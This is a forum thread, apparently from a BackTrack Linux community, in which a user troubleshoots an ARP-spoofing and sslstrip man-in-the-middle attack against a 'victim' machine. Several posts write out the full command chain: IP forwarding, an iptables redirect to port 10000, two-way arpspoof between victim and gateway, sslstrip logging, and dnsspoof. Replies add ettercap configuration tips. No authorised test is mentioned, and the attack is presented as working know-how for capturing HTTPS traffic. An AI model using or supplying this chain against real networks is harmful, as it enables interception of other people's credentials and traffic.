Results 1 to 10 of 10

Thread: problems with arpspoof, sslstrip, ettercap

  1. #1
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default problems with arpspoof, sslstrip, ettercap

    arpspoof and sslstrip

    I used the directions at [Video+Tutorial] How to: Snifff SSL / HTTPS (sslstrip) - Remote Exploit Forums, with some changes. I didn't use ettercap, and I arpspoofed from victim to gateway and back again, but the directions only instruct me to arpspoof victim-gateway. Sometimes I'm re-directed to http, but most of the time I get the ssl page. But, I always see the ssl stripped when i point my mouse over links on the victim computer. I have an alfa g card, which I don't think is the problem. I've run the attack on two computers with the same problem. I've googled and come up with lots of complaints with no solutions. Anyone know what is wrong?

    Ettercap
    I've run ettercap on several computers and have only gotten it to work once. I can't poison. chk_poison always says "no poisoning at all" and occasionally "no poisoning between ip and ip". I edited etter.conf, so that's not the problem. Any other suggestions?

  2. #2
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: problems with arpspoof, sslstrip, ettercap

    Which commands you used? post here, its easyer to help if know what your doing. Check hak5.org episode 610 its a good guide.

  3. #3
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: problems with arpspoof, sslstrip, ettercap

    for arpspoof and sslstrip i use the following commands:

    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    arpspoof -i wlan0 -t 192.168.1.110 192.168.1.254
    arpspoof -i wlan0 -t 192.168.1.254 192.168.1.110
    sslstrip.py -a -k -f --write /home/user/Desktop/output

    sometimes the pages time-out. sometimes i can browse the web, but i get ssl pages. occasionally, i'm re-directed to http and i capture everything. it's hit or miss.

    for ettercap i just use the GUI and get nowhere. no poisoning, ever.
    Last edited by username324; 03-09-2010 at 11:59 PM.

  4. #4
    Junior Member creepykrawler's Avatar
    Join Date
    Jan 2010
    Location
    USA
    Posts
    56

    Default Re: problems with arpspoof, sslstrip, ettercap

    What kind of wireless card are you using? Do you know the chipset?
    Also, you said you edited the etter.conf file, but what exactly did you edit?
    "Failing to plan is planning to fail"

  5. #5
    Senior Member micole's Avatar
    Join Date
    Jan 2010
    Location
    Charleston, SC
    Posts
    121

    Default Re: problems with arpspoof, sslstrip, ettercap

    Quote Originally Posted by username324 View Post
    for ettercap i just use the GUI and get nowhere. no poisoning, ever.
    I hate plugging my own stuff... But go here http://www.backtrack-linux.org/forum...poisoning.html and see if you edited your .conf file (like creepykrawler suggested).
    Common Knowledge: Username, "root". Password, "toor". "startx" gives you a GUI, and "fix-vesa" will fix BT if you have no GUI. Start networking with "/etc/init.d/networking start" and check your IP settings with "ifconfig -a". "dhclient" will automatically use DHCP for your IP. Google is your friend.

  6. #6
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: problems with arpspoof, sslstrip, ettercap

    Quote Originally Posted by username324 View Post
    for arpspoof and sslstrip i use the following commands:

    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    arpspoof -i wlan0 -t 192.168.1.110 192.168.1.254
    arpspoof -i wlan0 -t 192.168.1.254 192.168.1.110
    sslstrip.py -a -k -f --write /home/user/Desktop/output
    You dont need to use .py in name of sslstrip. --write is too not needed, by default it creates sslstrip.log file to your desktop /root/
    I did that sslstrip part like this
    Code:
    sslstrip -l 10000
    and to read that file I did
    Code:
    more sslstrip.log
    Its also nice to know which sites target goes.
    Code:
    dnsspoof
    Last edited by halfdone; 03-10-2010 at 05:11 PM.

  7. #7
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default

    I use an alfa AWUS036h. I edited etter.conf and uncommented iptables. halfdone, i tried your method with the same results.

    halfdone,

    i tried dnsspoof. I can see everything being forwarded through my computer, but like i said, the victim computer usually times out and only occasionally works. so, my computer isn't forwarding correctly. is that right? I think it may have to do with my iptables, but i don't mess with my rules other than the one rule to forward to port 10000.

    And, why all tutorials mention arpspoofing from vitcim--> gateway? I've only gotten it to work doing both victim-->gateway and gateway-->victim.
    Last edited by Archangel-Amael; 03-10-2010 at 09:53 PM.

  8. #8
    Junior Member creepykrawler's Avatar
    Join Date
    Jan 2010
    Location
    USA
    Posts
    56

    Default Re: problems with arpspoof, sslstrip, ettercap

    When using ettercap, also make sure you edit /etc/etter.conf the ec_uid and ec_gid line to both = 0 ( root )
    "Failing to plan is planning to fail"

  9. #9
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: problems with arpspoof, sslstrip, ettercap

    Quote Originally Posted by creepykrawler View Post
    When using ettercap, also make sure you edit /etc/etter.conf the ec_uid and ec_gid line to both = 0 ( root )
    did that too.

  10. #10
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: problems with arpspoof, sslstrip, ettercap

    ok, so i when i arp -a on the victim computer, the router's mac address remains the same, but the victim's ip changes to my mac. shouldn't both be my mac?

Similar Threads

  1. [Video] How to: Snifff SSL / HTTPS (sslstrip)
    By g0tmi1k in forum BackTrack Videos
    Replies: 78
    Last Post: 04-12-2011, 12:57 AM
  2. Sickness - Password Sniffing with SSLStrip.
    By sickness in forum BackTrack Videos
    Replies: 35
    Last Post: 09-17-2010, 01:16 PM
  3. Replies: 15
    Last Post: 03-20-2010, 03:10 AM
  4. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •